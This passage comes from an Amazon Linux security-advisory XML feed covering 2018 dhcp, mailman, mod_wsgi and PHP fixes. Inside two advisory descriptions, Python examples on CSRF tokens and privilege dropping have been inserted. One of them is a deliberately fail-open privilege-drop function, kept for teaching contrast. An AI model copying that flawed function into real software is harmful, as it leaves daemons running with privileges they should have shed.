arch="noarch"><filename>Packages/ruby20-doc-2.0.0.648-1.31.amzn1.noarch.rpm</filename></package><package name="ruby20" version="2.0.0.648" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-2.0.0.648-1.31.amzn1.x86_64.rpm</filename></package><package name="ruby20-devel" version="2.0.0.648" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-devel-2.0.0.648-1.31.amzn1.x86_64.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-io-console-0.4.2-1.31.amzn1.x86_64.rpm</filename></package><package name="rubygems20-devel" version="2.0.14.1" release="1.31.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-devel-2.0.14.1-1.31.amzn1.noarch.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-psych-2.0.0-1.31.amzn1.x86_64.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.648" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-debuginfo-2.0.0.648-1.31.amzn1.x86_64.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-psych-2.0.0-1.31.amzn1.i686.rpm</filename></package><package name="ruby20" version="2.0.0.648" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-2.0.0.648-1.31.amzn1.i686.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.648" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-debuginfo-2.0.0.648-1.31.amzn1.i686.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-io-console-0.4.2-1.31.amzn1.i686.rpm</filename></package><package name="ruby20-libs" version="2.0.0.648" release="1.31.amzn1" epoch="0" 
arch="i686"><filename>Packages/ruby20-libs-2.0.0.648-1.31.amzn1.i686.rpm</filename></package><package name="ruby20-devel" version="2.0.0.648" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-devel-2.0.0.648-1.31.amzn1.i686.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-bigdecimal-1.2.0-1.31.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-984</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-984: important priority package update for dhcp</title><issued date="2018-04-05 15:52:00" /><updated date="2018-04-05 23:12:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-5733:
A denial of service flaw was found in the way dhcpd handled reference counting when processing client requests. A malicious DHCP client could use this flaw to trigger a reference count overflow on the server side, potentially causing dhcpd to crash, by sending large amounts of traffic.
1549961:
CVE-2018-5733 dhcp: Reference count overflow in dhcpd allows denial of service
CVE-2018-5732:
An out-of-bound memory access flaw was found in the way dhclient processed a DHCP response packet. A malicious DHCP server could potentially use this flaw to crash dhclient processes running on DHCP client machines via a crafted DHCP response packet.
1549960:
CVE-2018-5732 dhcp: Buffer overflow in dhclient possibly allowing code execution triggered by malicious server
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5732" title="" id="CVE-2018-5732" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5733" title="" id="CVE-2018-5733" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="dhcp-debuginfo" version="4.1.1" release="53.P1.27.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-debuginfo-4.1.1-53.P1.27.amzn1.x86_64.rpm</filename></package><package name="dhcp-devel" version="4.1.1" release="53.P1.27.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-devel-4.1.1-53.P1.27.amzn1.x86_64.rpm</filename></package><package name="dhclient" version="4.1.1" release="53.P1.27.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhclient-4.1.1-53.P1.27.amzn1.x86_64.rpm</filename></package><package name="dhcp-common" version="4.1.1" release="53.P1.27.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-common-4.1.1-53.P1.27.amzn1.x86_64.rpm</filename></package><package name="dhcp" version="4.1.1" release="53.P1.27.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-4.1.1-53.P1.27.amzn1.x86_64.rpm</filename></package><package name="dhcp" version="4.1.1" release="53.P1.27.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-4.1.1-53.P1.27.amzn1.i686.rpm</filename></package><package name="dhcp-debuginfo" version="4.1.1" release="53.P1.27.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-debuginfo-4.1.1-53.P1.27.amzn1.i686.rpm</filename></package><package name="dhcp-common" version="4.1.1" release="53.P1.27.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-common-4.1.1-53.P1.27.amzn1.i686.rpm</filename></package><package name="dhclient" version="4.1.1" release="53.P1.27.amzn1" epoch="12" arch="i686"><filename>Packages/dhclient-4.1.1-53.P1.27.amzn1.i686.rpm</filename></package><package name="dhcp-devel" version="4.1.1" release="53.P1.27.amzn1" epoch="12" 
arch="i686"><filename>Packages/dhcp-devel-4.1.1-53.P1.27.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-985</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-985: medium priority package update for mailman</title><issued date="2018-04-05 16:46:00" /><updated date="2018-04-05 23:13:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-5950:
A cross-site scripting (XSS) flaw was found in mailman. An attacker, able to trick the user into visiting a specific URL, can execute arbitrary web scripts on the user&#039;s side and force the victim to perform unintended actions.
1537941:
CVE-2018-5950 mailman: Cross-site scripting (XSS) vulnerability in web UI
CVE-2016-6893:
Cross-site request forgery (CSRF) vulnerability in the user options page in GNU Mailman 2.1.x before 2.1.23 allows remote attackers to hijack the authentication of arbitrary users for requests that modify an option, as demonstrated by gaining access to the credentials of a victim&#039;s account.
1370155:
CVE-2016-6893 mailman: CSRF protection missing in the user options page
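The CSRF flaw above (CVE-2016-6893) comes down to a state-changing form that accepts any request carrying the victim's session, because nothing in the request proves the browser was shown the form by the server. The Python below is an added example and not Mailman's code or part of this advisory: it issues an HMAC token bound to the session user, the form action and an expiry, verifies it in constant time, and refuses a POST that lacks a valid one. SERVER_SECRET, the user and action names and the handle_options_post handler are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets
import time

# Hypothetical server-side key for this example; a real deployment loads it
# from configuration and rotates it, never hard-codes it.
SERVER_SECRET = b"example-secret-do-not-use"


def make_csrf_token(secret, user, action, now=None, ttl=3600):
    """Issue a token in the form "expiry.nonce.mac".

    The MAC covers the expiry, a random nonce, the session user and the form
    action, so a token minted for one user or one form cannot be replayed for
    another, and it stops working after ttl seconds.
    """
    if now is None:
        now = int(time.time())
    expiry = now + ttl
    nonce = secrets.token_hex(8)
    msg = f"{expiry}.{nonce}.{user}.{action}".encode()
    mac = hmac.new(secret, msg, hashlib.sha256).hexdigest()
    return f"{expiry}.{nonce}.{mac}"


def verify_csrf_token(secret, token, user, action, now=None):
    """Return True only for an unexpired token whose MAC matches this user and action."""
    if now is None:
        now = int(time.time())
    parts = token.split(".")
    if len(parts) != 3:
        return False
    expiry_s, nonce, mac = parts
    if not expiry_s.isdigit():
        return False
    if now > int(expiry_s):
        return False          # expired
    # Recompute over the literal fields that were signed.
    msg = f"{expiry_s}.{nonce}.{user}.{action}".encode()
    expected = hmac.new(secret, msg, hashlib.sha256).hexdigest()
    # Constant-time comparison so a forger learns nothing from timing.
    return hmac.compare_digest(expected, mac)


def handle_options_post(secret, session_user, form, now=None):
    """Hypothetical handler for a user-options form.

    The session identifies the user; the token proves the request originated
    from a page this server rendered for that user. Without the token check,
    any site the user visits could submit this form on their behalf.
    """
    token = form.get("csrf_token", "")
    if not verify_csrf_token(secret, token, session_user, "options", now=now):
        return (403, "missing or invalid CSRF token")
    return (200, f"options updated for {session_user}")


if __name__ == "__main__":
    tok = make_csrf_token(SERVER_SECRET, "alice", "options")
    print(handle_options_post(SERVER_SECRET, "alice", {"csrf_token": tok}))
    print(handle_options_post(SERVER_SECRET, "alice", {}))
```

The token is embedded in the rendered form as a hidden field and never placed in a URL, so the "trick the user into visiting a specific URL" path in the advisory cannot supply it; the same check must be applied to every request that modifies state, not only to the options page.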
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6893" title="" id="CVE-2016-6893" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5950" title="" id="CVE-2018-5950" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mailman" version="2.1.15" release="26.21.amzn1" epoch="4" arch="x86_64"><filename>Packages/mailman-2.1.15-26.21.amzn1.x86_64.rpm</filename></package><package name="mailman-debuginfo" version="2.1.15" release="26.21.amzn1" epoch="4" arch="x86_64"><filename>Packages/mailman-debuginfo-2.1.15-26.21.amzn1.x86_64.rpm</filename></package><package name="mailman" version="2.1.15" release="26.21.amzn1" epoch="4" arch="i686"><filename>Packages/mailman-2.1.15-26.21.amzn1.i686.rpm</filename></package><package name="mailman-debuginfo" version="2.1.15" release="26.21.amzn1" epoch="4" arch="i686"><filename>Packages/mailman-debuginfo-2.1.15-26.21.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-987</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-987: medium priority package update for mod24_wsgi</title><issued date="2018-04-26 16:33:00" /><updated date="2018-04-26 21:47:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8583:
mod_wsgi before 4.2.4 for Apache, when creating a daemon process group, does not properly handle when group privileges cannot be dropped, which might allow attackers to gain privileges via unspecified vectors.
1111034:
CVE-2014-8583 mod_wsgi: failure to handle errors when attempting to drop group privileges
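CVE-2014-8583 above is a fail-open privilege drop: when the group steps fail, the daemon process keeps running with the group privileges it was meant to shed instead of refusing to start. The Python below is an added example and not mod_wsgi's code or part of this advisory. It places the unchecked pattern next to a version that treats every step as fatal and then verifies the kernel's view of the process credentials rather than trusting the calls. The FakeSyscalls class and the uid/gid value 48 are constructed so the logic can be exercised without running as root.

```python
import os


class PrivilegeDropError(RuntimeError):
    """Raised when a process cannot shed the privileges it was asked to drop."""


def drop_privileges_unchecked(uid, gid, groups, api=os):
    """The failure mode described above: errors from the group steps are
    swallowed, so the process continues with root's gid and supplementary
    groups while believing it is unprivileged."""
    try:
        api.setgroups(list(groups))
        api.setgid(gid)
    except OSError:
        pass                      # BUG: treated as non-fatal
    api.setuid(uid)
    return True


def drop_privileges(uid, gid, groups, api=os):
    """Drop supplementary groups, then gid, then uid, in that order (uid last,
    since only root may change groups). Any failure aborts, and the result is
    verified against what the kernel reports."""
    steps = [
        ("setgroups", lambda: api.setgroups(list(groups))),
        ("setgid", lambda: api.setgid(gid)),
        ("setuid", lambda: api.setuid(uid)),
    ]
    for name, step in steps:
        try:
            step()
        except OSError as exc:
            raise PrivilegeDropError(f"{name} failed: {exc}") from exc
    # Check real, effective and saved ids so no path back to root remains.
    if api.getresuid() != (uid, uid, uid):
        raise PrivilegeDropError("uid not fully dropped")
    if api.getresgid() != (gid, gid, gid):
        raise PrivilegeDropError("gid not fully dropped")
    extra = set(api.getgroups()) - set(groups) - {gid}
    if extra:
        raise PrivilegeDropError(f"unexpected supplementary groups: {sorted(extra)}")
    return True


def attempt_drop(uid, gid, groups, api=os):
    """Wrapper returning (ok, message) instead of raising, for callers that log."""
    try:
        drop_privileges(uid, gid, groups, api=api)
        return (True, "privileges dropped")
    except PrivilegeDropError as exc:
        return (False, str(exc))


class FakeSyscalls:
    """Stand-in for the os module so the logic runs without root.
    fail_groups=True models a host where group privileges cannot be dropped."""

    def __init__(self, fail_groups=False):
        self.fail_groups = fail_groups
        self.uid = (0, 0, 0)
        self.gid = (0, 0, 0)
        self.groups = [0, 10]

    def setgroups(self, groups):
        if self.fail_groups:
            raise PermissionError(1, "Operation not permitted")
        self.groups = list(groups)

    def setgid(self, gid):
        if self.fail_groups:
            raise PermissionError(1, "Operation not permitted")
        self.gid = (gid, gid, gid)

    def setuid(self, uid):
        self.uid = (uid, uid, uid)

    def getresuid(self):
        return self.uid

    def getresgid(self):
        return self.gid

    def getgroups(self):
        return list(self.groups)


if __name__ == "__main__":
    broken = FakeSyscalls(fail_groups=True)
    drop_privileges_unchecked(48, 48, [48], api=broken)
    print("unchecked:", broken.getresuid(), broken.getresgid(), broken.getgroups())
    print("checked:", attempt_drop(48, 48, [48], api=FakeSyscalls(fail_groups=True)))
```

The verification step matters even when every call returns success: on Linux a process that kept a saved uid or gid of 0 can regain it with a single call, which is exactly what a daemon worker running untrusted application code must not be able to do.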
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8583" title="" id="CVE-2014-8583" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_wsgi-python35" version="3.5" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_wsgi-python35-3.5-1.25.amzn1.x86_64.rpm</filename></package><package name="mod24_wsgi-python36" version="3.5" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_wsgi-python36-3.5-1.25.amzn1.x86_64.rpm</filename></package><package name="mod24_wsgi-debuginfo" version="3.5" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_wsgi-debuginfo-3.5-1.25.amzn1.x86_64.rpm</filename></package><package name="mod24_wsgi-python26" version="3.5" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_wsgi-python26-3.5-1.25.amzn1.x86_64.rpm</filename></package><package name="mod24_wsgi-python27" version="3.5" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_wsgi-python27-3.5-1.25.amzn1.x86_64.rpm</filename></package><package name="mod24_wsgi-python34" version="3.5" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_wsgi-python34-3.5-1.25.amzn1.x86_64.rpm</filename></package><package name="mod24_wsgi-python35" version="3.5" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_wsgi-python35-3.5-1.25.amzn1.i686.rpm</filename></package><package name="mod24_wsgi-python26" version="3.5" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_wsgi-python26-3.5-1.25.amzn1.i686.rpm</filename></package><package name="mod24_wsgi-python27" version="3.5" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_wsgi-python27-3.5-1.25.amzn1.i686.rpm</filename></package><package name="mod24_wsgi-python36" version="3.5" release="1.25.amzn1" epoch="0" 
arch="i686"><filename>Packages/mod24_wsgi-python36-3.5-1.25.amzn1.i686.rpm</filename></package><package name="mod24_wsgi-debuginfo" version="3.5" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_wsgi-debuginfo-3.5-1.25.amzn1.i686.rpm</filename></package><package name="mod24_wsgi-python34" version="3.5" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_wsgi-python34-3.5-1.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-988</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-988: medium priority package update for php70 php56</title><issued date="2018-04-05 16:32:00" /><updated date="2018-04-05 23:15:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-7584:
In PHP through 5.6.33, 7.0.x before 7.0.28, 7.1.x through 7.1.14, and 7.2.x through 7.2.2, there is a stack-based buffer under-read while parsing an HTTP response in the php_stream_url_wrap_http_ex function in ext/standard/http_fopen_wrapper.c. This subsequently results in copying a large string.
1551039:
CVE-2018-7584 php: Stack-based buffer under-read in ext/standard/http_fopen_wrapper.c:php_stream_url_wrap_http_ex function when parsing HTTP response allows denial of service
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7584" title="" id="CVE-2018-7584" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php70-mcrypt" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mcrypt-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-process" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-process-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-bcmath" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-bcmath-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-xml" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-xml-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-mysqlnd" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mysqlnd-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-snmp" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-snmp-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-gmp" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-gmp-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-tidy" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-tidy-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-fpm" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-fpm-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-intl" version="7.0.29" release="1.28.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php70-intl-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-pgsql" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pgsql-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-pdo-dblib" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-dblib-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-dbg" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dbg-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-ldap" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-ldap-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-cli" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-cli-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-zip" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-zip-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-debuginfo" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-debuginfo-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-enchant" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-enchant-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-json" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-json-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-recode" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-recode-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-imap" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-imap-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-embedded" 
version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-embedded-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-opcache" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-opcache-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-dba" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dba-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-devel" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-devel-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-common" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-common-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-pdo" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-gd" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-gd-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-odbc" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-odbc-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-mbstring" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mbstring-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-soap" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-soap-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-pspell" version="7.0.29" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pspell-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-xmlrpc" version="7.0.29" release="1.28.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php70-xmlrpc-7.0.29-1.28.amzn1.x86_64.rpm</filename></package><package name="php70-tidy" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-tidy-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-enchant" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-enchant-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-ldap" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-ldap-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-snmp" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-snmp-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-gmp" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-gmp-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-dbg" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-dbg-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-embedded" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-embedded-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-xmlrpc" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-xmlrpc-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-zip" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-zip-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-intl" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-intl-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-devel" version="7.0.29" release="1.28.amzn1" epoch="0" 
arch="i686"><filename>Packages/php70-devel-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-gd" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-gd-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-json" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-json-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-pspell" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pspell-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-soap" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-soap-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-process" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-process-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-fpm" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-fpm-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-opcache" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-opcache-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-pgsql" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pgsql-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-mysqlnd" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mysqlnd-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-recode" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-recode-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-debuginfo" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-debuginfo-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-dba" version="7.0.29" release="1.28.amzn1" epoch="0" 
arch="i686"><filename>Packages/php70-dba-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-common" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-common-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-pdo" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-pdo-dblib" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-dblib-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-cli" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-cli-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-xml" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-xml-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-bcmath" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-bcmath-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-mbstring" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mbstring-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-imap" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-imap-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-odbc" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-odbc-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-mcrypt" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mcrypt-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.35" release="1.137.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php56-xml-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.35" release="1.137.amzn1" epoch="0" 